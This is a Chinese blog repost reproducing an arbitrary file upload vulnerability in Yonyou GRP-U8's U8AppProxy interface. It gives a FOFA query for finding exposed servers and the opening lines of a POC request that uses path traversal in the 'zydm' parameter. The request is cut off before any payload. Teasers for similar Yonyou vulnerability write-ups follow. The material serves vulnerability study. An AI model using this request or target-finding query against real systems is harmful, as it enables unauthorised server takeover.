用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用

9月前作者：OidBoy_G 分类：Toy博客阅读(41) 违法举报

这篇具有很好参考价值的文章主要介绍了用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

1、漏洞概述

用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 U8AppProxy接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限。

2、影响范围

用友GRP-U8行政事业内控管理软件（新政府会计制度专版）

3、复现环境

FOFA:title="用友GRP-U8行政事业内控管理软件"

用友grp-u8漏洞,漏洞复现,安全,网络安全,web安全

4、漏洞复现

访问漏洞环境，burp抓包发送Repeter模块进行复现

用友grp-u8漏洞,漏洞复现,安全,网络安全,web安全

用友grp-u8漏洞,漏洞复现,安全,网络安全,web安全

POC文章来源地址https://www.toymoban.com/news/detail-516026.html

POST /U8AppProxy?gnid=myinfo&id=saveheader&zydm=../../yongyouU8_test HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Fire

到了这里，关于用友GRP-U8 U8AppProxy任意文件上传漏洞复现+利用的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

用友U8+CRM 任意文件上传+读取漏洞复现（HW0day）

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件，旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞，攻击者通过漏洞可以获取到服务器权限。鹰图

2024年02月13日
浏览(37)
用友u8c文件上传

一、影响范围 2017版本，默认界面如下二、复现过程注意：在filename更改名字，若名字重复无法上传成功此请求包是为了证明马儿上传成功，直接可以使用冰蝎链接（马儿可以根据自己实际情况更改，连接工具也要做对应的修改）三、修复建议升级版本

2024年02月11日
浏览(37)
用友NC word.docx 任意文件读取漏洞复现

用友NC是一款企业级ERP软件。作为一种信息化管理工具，用友NC提供了一系列业务管理模块，包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等，帮助企业实现数字化转型和高效管理。用友NC 系统word.docx等接口存在任意文件读取漏洞，未经身份认证

2024年01月25日
浏览(31)
用友时空KSOA ImageUpload任意文件上传漏洞复现+利用

用友时空KSOA是建立在SOA理念指导下研发的新一代产品，是根据流通企业最前沿的I需求推出的统一的IT基础架构，它可以让流通企业各个时期建立的IT系统之间彼此轻松对话，帮助流通企业保护原有的IT投资，简化IT管理，提升竞争能力，确保企业整体的战略目标以及创新活

2024年02月15日
浏览(51)
用友NC BeanShell命令执行漏洞（CNVD-2021-30167）+任意文件读取漏洞+接口信息泄露

用友NC是一款企业级管理软件，在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞，通过BeanShell 执行远程命令获取服务器权限。漏洞POC 访问出现这个页面可能存在漏洞（还有一种情

2024年02月11日
浏览(31)
实战红队挖掘漏洞---用友时空KSOA v9.0版本ImageUpload任意文件上传漏洞+getshell

前言，本次笔记是记录在工作中的打红队时挖到的用友时空KSOA任意文件上传漏洞。 emmm，怎么说呢，就是又在一次加班码到晚上十点的时候，挖掘到了一个用友时空ksoa v9.0文件上传漏洞。大家先看看长什么样吧，大概就这样！版本这么明目张胆的就展现在我面前，不找一下这

2024年02月08日
浏览(48)
【U8+】使用天联高级版客户端登录用友U8，指定U8服务器地址。

【问题描述】当使用U8客户端电脑作为天联高级版软件服务器的时候，即：U8应用服务器和远程服务器不是同一台电脑。每次新建天高用户后，新的天高用户，登录天高客户端后并打开U8登录界面，用友U8的登录窗口服务器地址即为天高服务器的计算机名称，而不是用友U

2024年02月13日
浏览(45)
用友U8存货档案数据库插入存储过程

ALTER PROCEDURE addnew_inventory_zd ( @ydhcz NVARCHAR(60) ,--存货分类编码回传 --@cInvCode NVARCHAR(60) ,--存货编码 @cInvName NVARCHAR(255) ,--存货名称 @cInvStd NVARCHAR(255) ,--规格型号 @cInvCCode NVARCHAR(12) ,--存货大类编码 @cCreatePersonCode NVARCHAR(20) ,--建档

2024年02月07日
浏览(42)
用友U8供应商存货调价历史查询语句

SELECT (0) AS listserialnum, \\\' \\\' AS selcol, (btaxcost) AS btaxcost, (ccode) AS ccode, (dupdate) AS dupdate, (ddate) AS ddate, (cdepname) AS cdepname, (cpersonname) AS cpersonname, (cmainmemo) AS cmainmemo, (cmaker) AS cmaker, (cverifier)

2024年02月09日
浏览(39)
【U8+】用友U8+12.0在win11系统上IE Web Control 组件无法安装

【问题现象】在win11系统上，安装用友U8+12.0的时候，缺省组件中的IE Web Control 组件无法安装并且提示【microsoft internet explorer webcontrols requires iis version 5 or later】【解决方法】打开注册表（开始菜单–运行–regedit）找到路径： HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw3svc

2024年02月08日
浏览(47)